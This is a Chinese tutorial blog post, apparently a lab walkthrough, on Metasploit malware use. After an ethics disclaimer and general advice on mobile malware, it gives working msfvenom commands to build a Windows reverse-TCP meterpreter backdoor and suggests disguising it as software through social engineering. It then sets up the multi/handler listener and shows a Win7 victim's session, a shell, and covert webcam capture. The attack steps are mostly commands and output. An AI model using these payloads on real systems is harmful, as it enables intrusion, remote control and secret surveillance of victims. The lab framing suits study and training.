首页 > 编程语言 >MSF恶意程序利用【实战】

MSF恶意程序利用【实战】

时间:2023-10-01 11:00:12浏览次数:48  
标签:实战 kali win7 192.168 恶意程序 handler MSF 2.1 msf6

★关于道德伦理的忠告★

关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。

以下内容摘自《Metasploit渗透测试指南》

作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:

  • 不要进行恶意的攻击;

  • 不要做傻事;

  • 在没有获得书面授权时,不要攻击任何目标;

  • 考虑你的行为将会带来的后果;

  • 如果你干了些非法的事情,天网恢恢疏而不漏,你总会被抓到牢里的。

1、手机恶意应用程序分析

1.1、手机恶意应用程序理解

手机恶意应用程序:一般是指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序。它是介于病毒和正常软件之间的软件,它与病毒的区别是:一般还具备一定的正常功能。

1.2、危害性

恶意程序中植入的木马程序 ,可在用户不知情的情况下 ,收集用户个人隐私信息、恶意扣费 。

1.3、如何实现?

很多APP由于存在大量安全漏洞和缺乏安全措施,被不法分子二次打包后,或被直接仿冒,或植入广告、恶意代码,甚至加入违法内容,重新投放应用市场,严重危害用户隐私与财产安全,网络“黑产”链条也开始滋生 。

1.4、“官方”八招对付

八招对付恶意软件【来源于人民日报】:

1、选择官方渠道下载

2、关注流量使用

3、谨慎ROOT

4、注意权限信息

5、安装防病毒软件

6、不要在未知安全性的WIFI网络中上网

7、及时止损

8、及时举报

2、MSF恶意程序利用

2.0、说明

因为手机恶意程序利用的实验,我自己没有验证过就暂不做分享,以win7实验做为示例。

2.1、制作window恶意获取shell

后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为

思路:利用社会工程学中人的心理,为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 。

2.1.1、简介

msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。

实验内容:
制作Windows恶意软件获取shell,msfvenom的shell在windows中的使用 msfvenom生成shell.exe

2.1.2、实验步骤

2.1.2.1、实验环境

kali-linux系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4

win7系统,IP:192.168.242.6

2.1.2.2、生成后门软件

在kali系统生成后门软件,然后先复制到外面(本机),再复制到目标系统win7

msfvenom -p 添加载荷payload LHOST=监听的IP LPORT=监听的端口,只要不占用即可 -f 输出文件格式 > 目标文件的名称

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6060 -f exe > msftest.exe

注意:该步骤自己电脑的杀毒软件和防火墙需要暂时关闭,如果不想关闭的话,可以利用ms17-010漏洞上传文件到win7电脑,可以参考我前面写的《渗透测试实战-漏洞利用MS17-010》

2.1.2.3、启动侦听

在kali系统操作

# 启动metaspliot
msfconsole

# 启动成功结果--每次的图案不一样,主要关注下面的是否有msf6>  即表示成功
Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > 

# metasploit设置侦听 加载模块
msf6 > use exploit/multi/handler

# 引用成功结果 ,再在后面
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > 

# 设置payload
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

#设置kali的IP
msf6 exploit(multi/handler) > set lhost kali的ip

#设置kali的端口lport =6060,也就是生成后门的端口
msf6 exploit(multi/handler) > set lport 6060

#执行
msf6 exploit(multi/handler) > exploit 或者 run

# 结果
[*] Started reverse TCP handler on 192.168.242.4:6060 

2.1.2.4、win7系统双击后门软件

win7系统双击后门软件,然后观察kali系统会看到有对应信息串联起来,效果如下

[*] Sending stage (175174 bytes) to 192.168.242.6
[*] Meterpreter session 1 opened (192.168.242.4:6060 -> 192.168.242.6:2327) at 2023-09-11 11:07:36 -0400


2.1.2.4、操作命令控制win7系统
# 输入命令行
meterpreter > shell

# 连接成功
Process 8856 created.
Channel 1 created.

# 退出当前操作
exit

# 可进行拍照,只要目标系统有拍照功能
# 查看摄像头
meterpreter > webcam_list
# 结果表示有
1: Integrated Camera

# 通过摄像头拍照
meterpreter > webcam_snap

标签:实战,kali,win7,192.168,恶意程序,handler,MSF,2.1,msf6
From: https://www.cnblogs.com/huangxiufen/p/17738652.html

相关文章

  • 项目实战:ES的增加数据和查询数据
    文章目录背景在ES中增加数据新建索引删除索引在ES中查询数据查询数据总数量项目具体使用(实战)引入依赖方式一:使用配置类连接对应的es服务器创建配置类编写业务逻辑----根据关键字查询相关的聊天内容在ES中插入数据总结提升背景最近需要做一个有关查询聊天记录的功能,通过资料了解到......
  • 【matplotlib 实战】--面积图
    面积图,或称区域图,是一种随有序变量的变化,反映数值变化的统计图表。面积图也可用于多个系列数据的比较。这时,面积图的外观看上去类似层叠的山脉,在错落有致的外形下表达数据的总量和趋势。面积图不仅可以清晰地反映出数据的趋势变化,也能够强调不同类别的数据间的差距对比。面积图......
  • 高可用Kubernetes集群实战(二)
    安装containerd容器运行时[root@k8sm1~]#yuminstall-ycontainerd.io-1.6.6生成containerd配置文件创建配置文件存储目录[root@k8sm1~]#mkdir-p/etc/containerd生成配置文件[root@k8sm1~]#containerdconfigdefault>/etc/containerd/config.toml修改配置文件修改san......
  • 高可用Kubernetes集群实战(三)
    安装nginx安装依赖[root@k8sm1~]#yuminstall-yepel-release安装nginxkeepalived[root@k8sm1~]#yuminstall-ynginxkeepalivednginx-mod-stream配置nginx[root@k8sm1~]#cat/etc/nginx/nginx.conf#Formoreinformationonconfiguration,see:#*OfficialE......
  • 大模型强化学习——PPO项目实战
    【PPO算法介绍】PPO(Proximal Policy Optimization)是一种强化学习算法,它的目标是找到一个策略,使得根据这个策略采取行动可以获得最大的累积奖励。PPO的主要思想是在更新策略时,尽量让新策略不要偏离旧策略太远。这是通过在目标函数中添加一个额外的项来实现的,这个额外的项会惩罚......
  • lesson6课堂练习与讲解 (布局实战)
     packagecom.zym.lesson6;importjava.awt.*;importjava.awt.event.WindowAdapter;importjava.awt.event.WindowEvent;publicclassTestMixLayOut{publicstaticvoidmain(String[]args){Frameframe=newFrame("课堂练习,混合布局");......
  • 华为现网真机怎么抓包 端口镜像实战
    端口镜像-可以在不影响数据正常处理的情况下,把镜像端口的数据复制一份到观察端口-业务实时监控故障处理分析网络流量优化-汇聚点-定义:-把镜像端口【源端口】的数据复制一份到观察端口【目的端口】1.2.observe-portinterfaceg0/0/0interfacerangeg0/0/1tog0/0/2mirror......
  • Kbaor_2023_9_28_Java第一次实战项目_ELM_V1_食品的实体类、工具类与实现类
    Kbaor_2023_9_28_Java第一次实战项目_ELM_V1_食品的实体类、工具类与实现类ELM_V1_食品的实体类packageelm_V1;/***[食品实体类]**@author秦帅*@date2023-9-25*/publicclassFood{privateIntegerfoodId;//食品编号privateStringfoodNam......
  • Django实战项目-学习任务系统-需求说明
    一,需求说明在我最近的阅读中,我深深被一些关于智能或系统的小说吸引。这些小说的主角意外获得某种神秘的智能或系统,然后通过完成系统发布的各种任务,逐渐提升自己的知识和能力。即使是普通的屌丝,也能在系统的管理和奖励下,一步步实现自己的梦想。这种情景让我深感兴趣,于是我......
  • 博科交换机划zone实战
    1、查看主Esxi主机的wwn号,登录博科A交换机,输入以下命令查看端口对应的WWN号,switchshow 2、再登录ESXI主机确认WWN是否能对应得上 3、对博科交换机创建别名和划zone,两台博科交换机都必须做配置。alicreate"ESXI_F7PDUX060","51:40:2e:c0:18:1c:85:30;51:40:2e:c0:18:1c......